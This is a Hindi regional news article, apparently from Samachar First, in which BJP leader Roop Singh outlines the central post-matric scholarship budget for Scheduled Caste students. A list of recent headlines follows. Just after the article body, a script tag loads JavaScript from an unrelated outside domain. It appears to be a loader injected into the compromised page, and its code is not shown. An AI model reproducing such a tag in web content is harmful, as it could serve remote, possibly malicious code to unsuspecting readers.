Categories: हिमाचल

PM एससी पोस्ट मैट्रिक स्कॉलरशिप से लाभान्वित होंगे 5 करोड़ छात्रः रूप सिंह

<p>सिरमौर के संगड़ाह में भाजपा अनुसूचित जाति मोर्चा जिला अध्यक्ष एवं पूर्व विधायक रूप सिंह ने संगड़ाह में पत्रकार वार्ता की। उन्होंने कहा कि प्रधानमंत्री पोस्ट मैट्रिक स्कॉलरशिप के लिए केंद्रीय कैबिनेट द्वारा अगले 5 साल के लिए 59 हजार 048 करोड़ के बजट का प्रावधान किया गया है। दसवीं के बाद की पढ़ाई करने वाले अनुसूचित जाति के छात्रों को मिलने वाली इस स्कॉलरशिप से देश के 5 करोड़ से अधिक छात्र लाभान्वित होंगे। उक्त योजना के तहत छात्रवृत्ति की राशि डीबीटी मोड से छात्रों के खातों में सीधे ट्रांसफर की जाएगी।</p>

<p>उन्होंने कहा कि वर्ष 2019-20 में प्रतिवर्ष उक्त योजना के तहत सालाना 1,100 करोड़ का बजट उपलब्ध था, जिसे अब 5 गुना बढ़ाकर 2025 तक के लिए 6 हजार करोड़ सालाना किया गया है। इस योजना के तहत सालाना 60 लाख छात्रवृत्तियां प्रदान की जाएगी, जिसमें 60 फीसदी राशि केंद्र सरकार खर्च करेगी। केंद्र सरकार द्वारा अनुसूचित जाति और कमजोर तबके के लोगों के लिए ऐसी कईं योजनाएं चलाई जा रही है। मौर्चा जिला अध्यक्ष के अनुसार केंद्र सरकार की ऐसी योजनाओं में पूरी पारदर्शिता और जवाबदेही सुनिश्चित की गई है। डीबीटी मोड से माध्यम से सीधे लाभार्थियों के खाते में जा रही है। इन योजनाओं में गड़बड़ी की कोई गुंजाइश नहीं है।<img src=”/media/gallery/images/image(1924).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

Himachal: धर्मशाला से पूर्व भाजपा प्रत्याशी राकेश चौधरी का निधन

Poison Incident: जहरीला पदार्थ निगलने के बाद टांडा अस्‍पताल में भर्ती  धर्मशाला से दो बार…

3 hours ago

शोभा यात्रा से शुरू होगा शाहपुर दशहरा उत्सव, ‘बेटी है अनमोल’ को समर्पित दूसरी सांस्कृतिक संध्या

  Shahpur Dussehra Festival 2024:  उपमुख्य सचेतक केवल सिंह पठानिया ने जानकारी दी है कि…

3 hours ago

Hamirpur News: हमीरपुर में बनेंगे 49 नए आंगनबाड़ी केंद्र, जल्द होगा निर्माण कार्य शुरू

Anganwadi Centers in Hamirpur: जिला हमीरपुर में 49 नए आंगनबाड़ी केंद्र बनाए जाएंगे, जो मनरेगा…

4 hours ago

Himachal: लाहौल स्पीति में ट्रैकिंग के दौरान IIT मंडी के छात्र की मौत

Tragic Trekking Incident in Lahaul: लाहौल स्पीति के सिस्सू पंचायत के तहत अलियास झील के…

5 hours ago

3 नवंबर को शीतकाल के लिए बंद होंगे केदारनाथ मंदिर के कपाट, ऊखीमठ में विराजेंगे भगवान

Kedarnath Temple Winter Closure:  श्री केदारनाथ मंदिर के कपाट इस वर्ष शीतकाल के लिए 3…

6 hours ago